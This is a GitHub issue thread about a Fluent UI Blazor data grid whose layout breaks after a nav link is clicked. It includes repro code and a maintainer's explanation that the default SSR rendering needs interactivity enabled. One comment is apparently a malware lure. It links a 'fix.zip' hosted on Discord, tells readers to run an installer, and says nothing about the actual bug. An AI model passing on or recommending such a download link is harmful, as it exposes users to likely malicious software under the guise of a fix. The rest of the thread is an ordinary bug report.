### ISSUE TITLE
Clicking on the current (active) FluentNavMenu -->FluentNavLink will result in an incorrect FluentGridGrid style

### ISSUE THREAD

**Issue by QiTianQingShui** [microsoft/fluentui-blazor#2610]
# 🐛 Bug Report

![image](https://github.com/user-attachments/assets/677dc266-0585-40a4-b5b4-570302b10a1b)

## 💻 Repro or Code Sample
1. Create Project
```
dotnet new fluentblazor -o myproject
```
2. Modify the code in the Home.razor file
```
@page "/"
<PageTitle>Home</PageTitle>
<h1>Hello, world!</h1>
<FluentDataGrid id="manualGrid" GenerateHeader=GenerateHeaderOption.None GridTemplateColumns="1fr 1fr" TGridItem="string" role="grid">
    <FluentDataGridRow RowType="DataGridRowType.Header">
        <FluentDataGridCell GridColumn=1 CellType="DataGridCellType.ColumnHeader">Column 1</FluentDataGridCell>
        <FluentDataGridCell GridColumn=2 CellType="DataGridCellType.ColumnHeader">Column 2</FluentDataGridCell>
    </FluentDataGridRow>
    <FluentDataGridRow>
        <FluentDataGridCell GridColumn=1>1.1</FluentDataGridCell>
        <FluentDataGridCell GridColumn=2>1.2</FluentDataGridCell>
    </FluentDataGridRow>
    <FluentDataGridRow>
        <FluentDataGridCell GridColumn=1>2.1</FluentDataGridCell>
        <FluentDataGridCell GridColumn=2> 2.2</FluentDataGridCell>
    </FluentDataGridRow>
</FluentDataGrid>
```
3. Run
![image](https://github.com/user-attachments/assets/b9c48305-fbfd-468c-b4b7-428b1cf9f8a8)

4. Click "Home" 
![image](https://github.com/user-attachments/assets/e8c355cc-7577-4afa-8adb-1c4499522e59)

## 🤔 Expected Behavior
FluentDataGrid   The style should not be changed

## 😯 Current Behavior
The style of FluentTata has changed, with each row of data arranged vertically

Style before clicking 'home'：
![image](https://github.com/user-attachments/assets/0ac2ec43-584a-4bff-9057-5acebfa55b7b)
The style after clicking on "home":
![image](https://github.com/user-attachments/assets/069cd9bf-0b2f-4985-a30f-042785785430)
I am not sure if the problem is caused by missing styles

## 💁 Possible Solution

--

## 🔦 Context
--

## 🌍 Your Environment

- Microsoft Edge (128.0.2739.54)
* .NET and Fluent UI Blazor library Version 
```
<Project Sdk="Microsoft.NET.Sdk.Web">

  <PropertyGroup>
    <TargetFramework>net8.0</TargetFramework>
    <Nullable>enable</Nullable>
    <ImplicitUsings>enable</ImplicitUsings>
  </PropertyGroup>

  <ItemGroup>
	  <PackageReference Include="Microsoft.FluentUI.AspNetCore.Components" Version="4.*-* " />
    <PackageReference Include="Microsoft.FluentUI.AspNetCore.Components.Icons" Version="4.*-* " />
  </ItemGroup>
</Project>

```

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by vnbaaij** [comment]
When creating the project without any settings, like in step 1, Blazor will use SSR rendering **by default**.

For the DataGrid to work correctly, you need to have interactivity enabled either globally (through `Router`) or per page (by adding '@rendermode')
